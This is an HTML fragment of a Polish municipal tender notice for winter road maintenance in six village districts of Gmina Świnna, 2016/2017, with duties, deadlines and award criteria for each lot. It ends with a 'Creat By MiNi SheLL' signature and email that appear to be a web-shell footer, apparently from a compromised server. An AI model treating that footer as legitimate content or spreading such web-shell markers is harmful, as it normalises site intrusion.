              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający w trakcie realizacji przedmiotu umowy dopuszcza zmianę umowy w zakresie wynagrodzenia brutto, wynikającą z ustawowej zmiany stawki podatku VAT. Zmiana wynagrodzenia  brutto  Wykonawcy  w związku  ze  zmianą  stawki  podatku  VAT  nie wymaga zawarcia  aneksu do umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/10/2016, godzina: 9:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I Rejon I
                  
                <b>Nazwa: </b>Świnna<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy Świnna  w sezonie  zimowym 2016/2017   z podziałem na Rejony: Część I - Rejon I  sołectwo Świnna - drogi o długości 16 896 m    
   2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
 3. Odśnieżanie dróg na całej szerokości jezdni.
 4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania,  przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
   5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika z napędem na dwie osie wyposażonym w urządzenie do posypywania.
   6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał jeżeli istnieje  potrzeba posypania.
   7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
   8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika) jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
  10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
  11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych   i przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później  niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji od moment wezwania do odśnieżania</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II REJON II
                  
                <b>Nazwa: </b>Przyłęków<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy  Świnna  w sezonie  zimowym 2016/2017  Część II  Rejon II
  sołectwo   Przyłęków			 - drogi o długości     6 250 m
2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
 3. Odśnieżanie dróg na całej szerokości jezdni.
 4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania, przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
   5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika 
z napędem na dwie osie wyposażonym w urządzenie do posypywania.
 6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał jeżeli istnieje  potrzeba posypania.
   7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
   8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego  zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika) jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
  10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
  11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych   i 
        przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później  niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji od momentu wezwania do odśnieżania</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III Rejon III
                  
                <b>Nazwa: </b>Pewel Mała<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy  Świnna  w sezonie  zimowym 2016/2017   część III  
Rejon III    sołectwo   Pewel Mała    - drogi o długości    10 318 m
2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości  powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
   3. Odśnieżanie dróg na całej szerokości jezdni.
   4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania,  przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
   5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika  z napędem na dwie osie wyposażonym w urządzenie do posypywania.
   6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał  jeżeli istnieje  potrzeba posypania.
   7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
   8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę  podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika)  jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
  10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
  11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  
         załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych   i przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później  niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji od momentu wezwania do odśnieżania</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV  Rejon IV
                  
                <b>Nazwa: </b>Pewel  Ślemieńska<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy  Świnna  w sezonie  zimowym 2016/2017   Część IV
Rejon IV  sołectwo   Pewel Ślemieńska  - drogi o długości    11 878 m
2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym  usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
   3. Odśnieżanie dróg na całej szerokości jezdni.
   4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania,   przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
   5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika z napędem na dwie osie wyposażonym w urządzenie do posypywania.
   6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał jeżeli istnieje  potrzeba posypania.
   7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
   8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę   podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika) jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
  10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
  11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych i przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później   niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>czas reakcji od momentu wezwania do odśnieżania</td><td>40</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V Rejon V
                  
                <b>Nazwa: </b>Rychwałdek<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy Świnna  w sezonie  zimowym 2016/2017  Część V  Rejon  V    sołectwo   Rychwałdek	- drogi o długości      5 814 m 
2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
   3. Odśnieżanie dróg na całej szerokości jezdni.
   4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania,  przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
   5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika z napędem na dwie osie wyposażonym w urządzenie do posypywania.
   6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał jeżeli istnieje  potrzeba posypania.
   7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
   8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę 
       podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego 
        zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika) 
        jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
  10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
  11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  
         załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych   i 
        przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później 
        niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td> cena </td><td>60</td></tr><tr><td>czas reakcji od momentu wezwania do odśnieżania</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VI    Rejon  VI
                  
                <b>Nazwa: </b>Trzebinia<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy   Świnna  w sezonie  zimowym 2016/2017   Część VI     Rejon VI    sołectwo   Trzebinia - drogi o długości    10 810 m 
   2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
   3. Odśnieżanie dróg na całej szerokości jezdni.
   4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach  decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania,  przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
   5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika  z napędem na dwie osie wyposażonym w urządzenie do posypywania.
   6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał jeżeli istnieje  potrzeba posypania.
   7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
   8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę  podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika)  jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
  10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
  11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych   i przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji od momentu wezwania do odśnieżania</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com